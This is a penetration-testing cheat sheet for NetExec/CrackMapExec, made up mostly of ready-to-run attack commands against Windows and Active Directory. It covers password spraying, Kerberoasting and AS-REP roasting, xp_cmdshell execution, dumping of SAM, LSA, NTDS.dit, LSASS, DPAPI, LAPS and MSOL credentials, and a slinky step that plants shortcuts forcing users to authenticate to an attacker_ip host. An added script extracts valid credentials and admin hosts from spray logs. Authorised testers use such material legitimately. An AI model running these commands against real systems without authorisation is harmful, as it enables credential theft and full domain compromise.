A cheat sheet for NetExec and CrackMapExec, featuring useful commands and modules for different services to use during Pentesting
Enumeration
Initial Enumeration
Null Authentication
```bash
netexec smb target -u '' -p ''
```
Guest Authentication
```bash
netexec smb target -u 'guest' -p ''
```
List Shares
```bash
netexec smb target -u '' -p '' --shares
netexec smb target -u username -p password --shares
```
List Usernames
```bash
netexec smb target -u '' -p '' --users
netexec smb target -u '' -p '' --rid-brute
netexec smb target -u username -p password --users
```
`--rid-brute` enumerates accounts by cycling RIDs over SAMR/LSA lookups and often works where `--users` is denied; it stops at RID 4000 by default, so pass a higher limit (`--rid-brute 10000`) on larger domains.
Local Authentication
```bash
netexec smb target -u username -p password --local-auth
```
`--local-auth` authenticates against the host's local SAM instead of the domain.
Using Kerberos
```bash
netexec smb target -u username -p password -k
```
With `-k` the target must be a resolvable hostname/FQDN rather than an IP, since the service ticket is requested for that name. To reuse a ticket already in a ccache, export `KRB5CCNAME` and pass `--use-kcache` instead of a password.
Check for hosts that have SMB signing disabled
```bash
netexec smb target(s) --gen-relay-list relay.txt
```
`target(s)` can be a single host, a CIDR range or a file of hosts. The output file lists the hosts that report `signing:False` (signing not required), which is the target list for an NTLM relay (e.g. `ntlmrelayx.py -tf relay.txt`).
Spraying
Password Spray
```bash
netexec smb target -u users.txt -p password --continue-on-success
netexec smb target -u usernames.txt -p passwords.txt --no-bruteforce --continue-on-success
netexec ssh target -u username -p password --continue-on-success
```
Without `--no-bruteforce` every user is tried against every password; with it, line N of the user file is paired only with line N of the password file. `--continue-on-success` keeps spraying after the first valid login instead of stopping. Check the lockout threshold first (`--pass-pol`) and watch for `STATUS_ACCOUNT_LOCKED_OUT` in the output.
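The spray and `--gen-relay-list` commands above produce a lot of console output; the helper below (an added example, not part of NetExec or the original cheat sheet) pulls the valid credentials, local-admin hosts, locked accounts and signing-disabled hosts out of a saved run such as `netexec smb targets.txt -u users.txt -p pass --continue-on-success | tee spray.log`. It assumes NetExec's default column layout (`PROTO IP PORT HOST [status] message ...`); the log lines it parses are constructed, not real output.

```bash
#!/usr/bin/env bash
# Added helper: parse saved NetExec output. Assumes the default column layout
#   PROTO  IP  PORT  HOST  [status]  domain\user:password  (extra)
# Passwords containing whitespace would be cut at the first space.

# NetExec colours its output; drop ANSI escape sequences before parsing.
strip_ansi() {
  sed "s/$(printf '\033')\[[0-9;]*m//g"
}

# Unique "domain\user:password" pairs that authenticated ([+] lines).
nxc_valid_creds() {
  strip_ansi < "$1" | awk '$5 == "[+]" { print $6 }' | sort -u
}

# Hosts (ip hostname) where the credential is a local administrator (Pwn3d!).
nxc_admin_hosts() {
  strip_ansi < "$1" | awk '$5 == "[+]" && /\(Pwn3d!\)/ { print $2, $4 }' | sort -u
}

# Accounts that reported a lockout: stop spraying and re-read the policy.
nxc_locked_accounts() {
  strip_ansi < "$1" | awk '/STATUS_ACCOUNT_LOCKED_OUT/ { sub(/:.*/, "", $6); print $6 }' | sort -u
}

# Hosts whose SMB signing is not required: the same set --gen-relay-list writes.
nxc_unsigned_hosts() {
  strip_ansi < "$1" | awk '/\(signing:False\)/ { print $2 }' | sort -u
}

# Constructed sample of what a spray run prints (not captured from a real target).
write_sample_log() {
  cat > "$1" <<'EOF'
SMB         10.10.10.10     445    DC01             [*] Windows Server 2019 Build 17763 x64 (name:DC01) (domain:corp.local) (signing:True) (SMBv1:False)
SMB         10.10.10.11     445    WS01             [*] Windows 10 Build 19041 x64 (name:WS01) (domain:corp.local) (signing:False) (SMBv1:False)
SMB         10.10.10.10     445    DC01             [+] corp.local\jdoe:Password1
SMB         10.10.10.11     445    WS01             [+] corp.local\jdoe:Password1 (Pwn3d!)
SMB         10.10.10.11     445    WS01             [-] corp.local\asmith:Password1 STATUS_LOGON_FAILURE
SMB         10.10.10.10     445    DC01             [-] corp.local\bob:Password1 STATUS_ACCOUNT_LOCKED_OUT
EOF
}

log=$(mktemp)
write_sample_log "$log"
echo "valid creds:";      nxc_valid_creds "$log"
echo "local admin on:";   nxc_admin_hosts "$log"
echo "locked accounts:";  nxc_locked_accounts "$log"
echo "signing not required:"; nxc_unsigned_hosts "$log"
rm -f "$log"
```

Point the functions at your own log instead of the sample; `nxc_unsigned_hosts` gives the same hosts as `--gen-relay-list` when you already have an enumeration log and do not want to rescan.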
SMB
All In One
```bash
netexec smb target -u username -p password --groups --local-groups --loggedon-users --rid-brute --sessions --users --shares --pass-pol
```
Spider_plus Module
```bash
netexec smb target -u username -p password -M spider_plus
netexec smb target -u username -p password -M spider_plus -o READ_ONLY=false
```
By default `spider_plus` only inventories the readable shares and writes a JSON listing (under `/tmp/nxc_hosted/nxc_spider_plus/` by default); `READ_ONLY=false` additionally downloads the files it finds.
Dump a specific file
```bash
netexec smb target -u username -p password -k --get-file target_file output_file --share sharename
```
The first argument is the remote path (relative to the root of `sharename`), the second is where to write it locally.
FTP
List folders and files
```bash
netexec ftp target -u username -p password --ls
```
List files inside a folder
```bash
netexec ftp target -u username -p password --ls folder_name
```
Retrieve a specific file
```bash
netexec ftp target -u username -p password --ls folder_name --get file_name
```
LDAP
Enumerate users using ldap
```bash
netexec ldap target -u '' -p '' --users
```
All In One
```bash
netexec ldap target -u username -p password --trusted-for-delegation --password-not-required --admin-count --users --groups
```
Kerberoast
```bash
netexec ldap target -u username -p password --kerberoasting kerb.txt
```
Crack the output with `hashcat -m 13100`.
AS-REP roast
```bash
netexec ldap target -u username -p password --asreproast asrep.txt
```
Crack the output with `hashcat -m 18200`. AS-REP roasting does not need valid credentials: with a username list, `-u users.txt -p ''` will still return hashes for accounts that have pre-authentication disabled.
MSSQL
Authentication
```bash
netexec mssql target -u username -p password
```
By default the username is treated as a Windows (domain) login; add `--local-auth` for a SQL Server login such as `sa`.
Execute commands using xp_cmdshell
`-x` runs the command through cmd, `-X` through PowerShell. This needs a login with sysadmin rights (or `xp_cmdshell` already enabled).
```bash
netexec mssql target -u username -p password -x command_to_execute
netexec mssql target -u username -p password -X powershell_command
```
Get a file
```bash
netexec mssql target -u username -p password --get-file target_file output_file
```
As with SMB, the remote path comes first and the local destination second; confirm the order with `netexec mssql --help` if unsure.
Secrets Dump
Dump SAM and LSA secrets
```bash
netexec smb target -u username -p password --local-auth --sam
netexec smb target -u username -p password --local-auth --lsa
```
Both require local administrator on the target.
gMSA
```bash
netexec ldap target -u username -p password --gmsa
netexec ldap target -u username -p password --gmsa-convert-id id
netexec ldap domain -u username -p password --gmsa-decrypt-lsa gmsa_account
```
`--gmsa` lists the gMSA accounts and, where the supplied user is allowed to read `msDS-ManagedPassword`, their NT hashes. The other two turn a gMSA id / LSA blob recovered from a host (e.g. via `--lsa`) into the account's hash.
Group Policy Preferences
```bash
netexec smb target -u username -p password -M gpp_password
```
Looks for cpassword values in Groups.xml and similar files on SYSVOL and decrypts them with the published AES key.
LAPS v1 and v2 passwords
```bash
netexec ldap target -u username -p password -M laps
netexec smb target -u username -p password --laps
```
The `laps` module reads the LAPS-managed local administrator passwords from LDAP for every computer the supplied user is allowed to read. `--laps` on the smb protocol instead fetches the target's LAPS password and authenticates to that host with it, so it is the way to run the other smb options (`--sam`, `--lsa`, `--dpapi`, ...) as local admin through LAPS.
Dump DPAPI credentials
```bash
netexec smb target -u username -p password --dpapi
netexec smb target -u username -p password --laps --dpapi
```
Dumps the DPAPI master keys and decrypts the Credential Manager / browser secrets protected by them; the second form does the same using the LAPS password for the target.
Dump NTDS.dit
```bash
netexec smb target -u username -p password --ntds
netexec smb target -u username -p password --ntds vss
```
Requires replication rights (Domain Admin or equivalent). The default uses DRSUAPI replication; `vss` copies the file through a shadow copy instead.
Bloodhound
```bash
netexec ldap target -u username -p password --bloodhound -ns ip --collection All
```
`-ns` is the DNS server (normally the DC); add `--dns-tcp` if UDP DNS is blocked.
Useful Modules
Webdav
Checks whether the WebClient service is running on the target (a host running it will authenticate over HTTP when coerced, which is what makes NTLM relay to LDAP/LDAPS possible).
```bash
netexec smb ip -u username -p password -M webdav
```
Veeam
Extracts credentials from the local Veeam SQL database.
```bash
netexec smb target -u username -p password -M veeam
```
slinky
Creates Windows shortcuts whose icon attribute contains a UNC path to the specified SMB server in all shares with write permissions, so anyone browsing the share authenticates to that server.
```bash
netexec smb ip -u username -p password -M slinky -o NAME=shortcut_name SERVER=attacker_ip
netexec smb ip -u username -p password -M slinky -o NAME=shortcut_name CLEANUP=True
```
This writes to every writable share it finds; run it again with `CLEANUP=True` to remove the shortcuts when done.
ntdsutil
Dumps NTDS by creating a copy with ntdsutil and parsing it locally.
```bash
netexec smb ip -u username -p password -M ntdsutil
```
ldap-checker
Checks whether LDAP signing and LDAPS channel binding are required and/or enforced.
```bash
netexec ldap target -u username -p password -M ldap-checker
```
Check if the DC is vulnerable to zerologon, petitpotam, nopac
These are check modules; they report whether the DC looks vulnerable and do not carry out the exploit.
```bash
netexec smb target -u username -p password -M zerologon
netexec smb target -u username -p password -M petitpotam
netexec smb target -u username -p password -M nopac
```
Check the MachineAccountQuota
```bash
netexec ldap target -u username -p password -M maq
```
ADCS Enumeration
```bash
netexec ldap target -u username -p password -M adcs
```
Lists the enrollment services (CAs) and certificate templates published in AD.
Dump lsass
```bash
netexec smb target -u username -p password -M lsassy
```
Retrieve MSOL account password
Run this against the Azure AD Connect server; it extracts the MSOL_ (AD Connect sync) account password from the local ADSync database.
```bash
netexec smb target -u username -p password -M msol
```
Resources